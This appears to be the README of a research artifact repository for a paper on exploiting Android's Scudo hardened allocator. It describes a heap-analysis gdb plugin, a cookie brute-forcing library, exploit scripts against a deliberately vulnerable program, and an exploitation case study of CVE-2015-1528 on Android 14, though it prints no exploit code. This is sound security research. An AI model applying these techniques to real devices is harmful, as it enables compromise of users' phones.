This repository contains the artifacts of the Exploiting Android's Hardened Memory Allocator paper.
The gdb-plugin folder contains the gdb plugin which helps analyzing the scudo heap state.
The plugin is designed to be used for gef.
To use the plugin please install gef from: https://github.com/hugsy/gef
There is also a port for pwndbg at gdb-plugin/scudo-pwndbg.py. (Thanks to @ju256)
A python3 library which allows to conveniently compute a chunk's checksum or bruteforce the cookie given a chunk's address and header.
Installation:
cd scudocookie && sudo python3 setup.py install
A vulnerable heap menu program along with pwntools python3 scripts that
showcase our exploitation techniques forged CommitBase and safe unlink.
In order to run the scripts please install scudocookie (you also need pwntools to run the python scripts).
Forged CommitBase exploit:
cd exploits && python3 forged_commitbase.py GDB
Safe Unlink exploit:
cd exploits && python3 safe_unlink.py GDB
Alternatively you can use the provided Dockerfile and run the exploits inside the docker with all dependencies.
cd exploits && ./build_docker.sh && ./run_docker.sh
The artifacts used in our exploitation case study, in which we backported CVE-2015-1528 and exploited the
system server on Android 14.
For details on how to run it check the README.md in the case-study folder.